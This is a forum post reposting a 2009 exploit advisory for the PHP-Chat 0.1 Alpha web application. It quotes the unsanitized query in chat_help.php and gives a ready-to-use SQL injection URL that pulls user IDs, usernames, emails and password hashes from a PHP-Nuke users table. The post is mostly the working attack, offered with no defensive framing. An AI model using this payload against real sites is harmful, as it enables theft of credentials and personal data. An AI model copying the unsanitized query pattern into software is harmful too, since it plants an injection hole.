Jump to content
ZeroCold

PHP-Chat 0.1 Alpha SQL Injection

Recommended Posts

PHP-Chat 0.1 Alpha SQL Injection

/////////////////////////////////////////////////////////////////
// R00TSECURITY.ORG - YOUR SECURITY COMMUNITY
// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
// [2009-09-22] PHP-Chat 0.1 Alpha SQL Injection
// http://r00tsecurity.org/db/exploits/290
// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
// GENERATED ON: 2009-12-01 | 00:46:38
/////////////////////////////////////////////////////////////////


EXPLOIT INFO
PHP-Chat is based purely on PHP/MySQL which means I don\\\'t use any other technology such as Java or Javascript.The Chat will be released as both a stand-alone and a PHP-Nuke version.

http://sourceforge.net/projects/php-chat

The exploit is located in the file chat_help.php where the $HTTP_GET_VARS[command] is passed directly to mysql without first sanitizing it
[]
$query = \\\"SELECT * FROM `\\\" . $table_prefix . \\\"chathelp` WHERE `id` = \\\'$HTTP_GET_VARS[command]\\\' LIMIT 1\\\";
$result = mysql_query($query) or die(\\\"$query failed!\\\");
$row = mysql_fetch_row($result);
[]

EXPLOIT
http://www.site.com/php-chat/chat_help.php?command=-1\\\'+UNION+SELECT+1,concat(user_id,username,user_email,user_password),3,4+FROM+nuke_users/*

// http://r00tsecurity.org/db/exploits/290

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...